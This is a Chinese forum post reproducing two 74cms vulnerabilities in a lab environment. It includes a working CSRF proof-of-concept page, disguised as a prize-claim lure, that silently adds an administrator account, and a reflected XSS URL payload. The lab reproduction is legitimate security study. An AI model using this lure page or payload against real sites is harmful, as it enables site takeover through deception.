74cms 漏洞复现

Track-mss   ·   发表于 2021-08-24 16:37:10   ·   CTF&WP专版

0X01 74cms v5.0.1 CSRF 漏洞复现

打开页面

访问构造好的恶意页面:

点击领取后,新管理员被添加。

使用新管理员登陆,可见能够成功登陆:

poc(需手动修改靶场域名):

  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <meta charset="UTF-8">
  5. <title>恭喜你中奖啦</title>
  6. </head>
  7.   <body>
  8. <center> <img src="http://5b0988e595225.cdn.sohucs.com/images/20181224/19d726af92e848b69690d786a5390f66.jpeg"/></center>
  9.     <form action="此处为靶场域名?m=admin&c=admin&a=add" method="POST" id="transfer" name="transfer">
  10.         <input type="hidden" name="username" value="test">
  11.         <input type="hidden" name="email" value="test@test.com">
  12.         <input type="hidden" name="password" value="passwd">
  13.         <input type="hidden" name="repassword" value="passwd">
  14.         <input type="hidden" name="role_id" value="1">
  15.         <input type="hidden" name="submit3" value="添加">
  16. <center><button type="submit" value="Submit">进入领取</button></center>
  17.       </form>
  18.   </body>
  19. </html>

0X02 74cms v6.0.4 反射型XSS

一个很新的反射型XSS漏洞,来自较新版本的74cms。
打开网址,来到首页。 在url处拼接payload,触发xss:

payload:

  1. http://[此处为靶场网址]/index.php?m=&c=help&a=help_list&key=137244gq1lw%253cscript%253ealert%25281%2529%253c%252fscript%253edutvxlqd4lq&__hash__=d7aa5a382f14d270c3ac4de8392b4e1d_a34adb2b339972672eb447276f69ee88

打赏我,让我更有动力~

0 条回复   |  直到 2021-8-24 | 2609 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.